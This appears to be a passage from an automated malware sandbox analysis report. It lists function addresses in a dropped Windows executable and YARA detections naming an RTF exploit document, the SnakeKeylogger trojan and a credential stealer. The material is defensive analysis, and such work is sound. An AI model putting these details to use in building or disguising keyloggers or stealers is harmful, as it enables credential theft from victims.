                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A83808_2_003A8380
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A0FE08_2_003A0FE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A41E08_2_003A41E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A73E08_2_003A73E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A25C08_2_003A25C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A57C08_2_003A57C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003A89C08_2_003A89C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FE2508_2_003FE250
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F82B08_2_003F82B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FE23F8_2_003FE23F
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F57398_2_003F5739
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F17388_2_003F1738
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FFA388_2_003FFA38
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FB7378_2_003FB737
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F6E328_2_003F6E32
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F8C318_2_003F8C31
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F2E308_2_003F2E30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FCF308_2_003FCF30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FA4288_2_003FA428
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FFA288_2_003FFA28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FCF208_2_003FCF20
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F4E188_2_003F4E18
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FE7188_2_003FE718
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FA4188_2_003FA418
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F65108_2_003F6510
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FBC108_2_003FBC10
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FE70A8_2_003FE70A
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F4E098_2_003F4E09
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F0E088_2_003F0E08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F7C088_2_003F7C08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F91088_2_003F9108
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F25008_2_003F2500
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F65008_2_003F6500
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F60788_2_003F6078
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F87788_2_003F8778
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FDD788_2_003FDD78
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FB2728_2_003FB272
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F09708_2_003F0970
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F77708_2_003F7770
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FF5708_2_003FF570
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F49708_2_003F4970
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F20688_2_003F2068
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FCA688_2_003FCA68
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F60688_2_003F6068
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F87678_2_003F8767
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F37608_2_003F3760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F9F608_2_003F9F60
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F09608_2_003F0960
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F77608_2_003F7760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F37528_2_003F3752
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F40508_2_003F4050
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F9F4F8_2_003F9F4F
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F57488_2_003F5748
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FB7488_2_003FB748
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F00408_2_003F0040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F6E408_2_003F6E40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F8C408_2_003F8C40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F40408_2_003F4040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F3BB88_2_003F3BB8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FADB88_2_003FADB8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F52B08_2_003F52B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FD8AF8_2_003FD8AF
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F3BAA8_2_003F3BAA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F69A88_2_003F69A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FF0A88_2_003FF0A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FADA88_2_003FADA8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F52A18_2_003F52A1
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F12A08_2_003F12A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FC5A08_2_003FC5A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F699A8_2_003F699A
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F29988_2_003F2998
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F9A988_2_003F9A98
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FF0988_2_003FF098
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FC5908_2_003FC590
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F9A898_2_003F9A89
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FDD888_2_003FDD88
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F49808_2_003F4980
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FB2808_2_003FB280
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F90FC8_2_003F90FC
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FD3F88_2_003FD3F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F7BF88_2_003F7BF8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FA8F08_2_003FA8F0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F44E88_2_003F44E8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FD3E88_2_003FD3E8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F5BE08_2_003F5BE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FEBE08_2_003FEBE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FA8E08_2_003FA8E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F04D88_2_003F04D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F72D88_2_003F72D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FC0D88_2_003FC0D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F44D88_2_003F44D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F1BD08_2_003F1BD0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F95D08_2_003F95D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F5BD08_2_003F5BD0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FEBCF8_2_003FEBCF
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F72C98_2_003F72C9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F32C88_2_003F32C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003FD8C08_2_003FD8C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F95C08_2_003F95C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054A1208_2_0054A120
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054D6408_2_0054D640
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054A4408_2_0054A440
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005400408_2_00540040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054C0608_2_0054C060
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054F2608_2_0054F260
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005430108_2_00543010
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005400068_2_00540006
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054D0008_2_0054D000
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054BA208_2_0054BA20
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054EC208_2_0054EC20
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005418288_2_00541828
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005434D88_2_005434D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054E2C08_2_0054E2C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054B0C08_2_0054B0C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00541CF08_2_00541CF0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005404F88_2_005404F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054CCE08_2_0054CCE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00540E988_2_00540E98
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00540E878_2_00540E87
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054AA808_2_0054AA80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005426808_2_00542680
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054DC808_2_0054DC80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054C6A08_2_0054C6A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054F8A08_2_0054F8A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054A7508_2_0054A750
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054BD408_2_0054BD40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054EF408_2_0054EF40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00542B488_2_00542B48
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054A7608_2_0054A760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005413608_2_00541360
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054D9608_2_0054D960
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054B7008_2_0054B700
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054E9008_2_0054E900
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005405088_2_00540508
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054D3208_2_0054D320
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005409D08_2_005409D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054C9C08_2_0054C9C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054FBC08_2_0054FBC0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005409C28_2_005409C2
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054E5E08_2_0054E5E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054B3E08_2_0054B3E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054C3808_2_0054C380
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054F5808_2_0054F580
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005421B88_2_005421B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054ADA08_2_0054ADA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005439A08_2_005439A0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0054DFA08_2_0054DFA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005600408_2_00560040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005687508_2_00568750
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056305F8_2_0056305F
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005694588_2_00569458
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056AA598_2_0056AA59
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056F7408_2_0056F740
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00566D408_2_00566D40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00567A408_2_00567A40
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005687408_2_00568740
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00567A488_2_00567A48
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005694488_2_00569448
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056B7708_2_0056B770
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005630708_2_00563070
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00564A708_2_00564A70
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00563D788_2_00563D78
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C4788_2_0056C478
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056E9788_2_0056E978
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005657788_2_00565778
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056DE788_2_0056DE78
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056B7608_2_0056B760
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056AA688_2_0056AA68
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C4688_2_0056C468
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00563D698_2_00563D69
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056EE108_2_0056EE10
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005639108_2_00563910
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C0108_2_0056C010
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056461C8_2_0056461C
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056B3188_2_0056B318
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005600068_2_00560006
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005690008_2_00569000
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00569D088_2_00569D08
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056B3088_2_0056B308
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005653308_2_00565330
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056DA308_2_0056DA30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00566D308_2_00566D30
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056F7308_2_0056F730
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005660388_2_00566038
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C0208_2_0056C020
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005639208_2_00563920
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005653208_2_00565320
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056CD288_2_0056CD28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005646288_2_00564628
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005660288_2_00566028
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00565BD48_2_00565BD4
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C8D08_2_0056C8D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005641D08_2_005641D0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00564ED08_2_00564ED0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00564ED88_2_00564ED8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056D5D88_2_0056D5D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056FBD88_2_0056FBD8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056AEC08_2_0056AEC0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005641C08_2_005641C0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056C8C18_2_0056C8C1
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056BBC88_2_0056BBC8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005634C88_2_005634C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00562AC98_2_00562AC9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005682F68_2_005682F6
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005675F08_2_005675F0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00568FF08_2_00568FF0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005682F88_2_005682F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005668E48_2_005668E4
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00565BE08_2_00565BE0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056E4E08_2_0056E4E0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005668E88_2_005668E8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005664908_2_00566490
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00567E9E8_2_00567E9E
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005671988_2_00567198
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00568B988_2_00568B98
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056D1808_2_0056D180
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00564A808_2_00564A80
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005664808_2_00566480
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005657888_2_00565788
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056DE888_2_0056DE88
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005671888_2_00567188
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005698B08_2_005698B0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056AEB08_2_0056AEB0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056BBB88_2_0056BBB8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005634B98_2_005634B9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_005698A28_2_005698A2
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00567EA08_2_00567EA0
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0056F2A88_2_0056F2A8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00568BA88_2_00568BA8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00652E788_2_00652E78
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006500408_2_00650040
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006535588_2_00653558
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00653C388_2_00653C38
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006543188_2_00654318
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006549F88_2_006549F8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006550D88_2_006550D8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006557B88_2_006557B8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00652E688_2_00652E68
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_0065354A8_2_0065354A
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006521218_2_00652121
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00653C288_2_00653C28
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006521308_2_00652130
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00652B008_2_00652B00
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006543088_2_00654308
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006549E98_2_006549E9
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00652AF28_2_00652AF2
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006550C88_2_006550C8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_00650ED88_2_00650ED8
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_006557A88_2_006557A8
                  Source: na.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
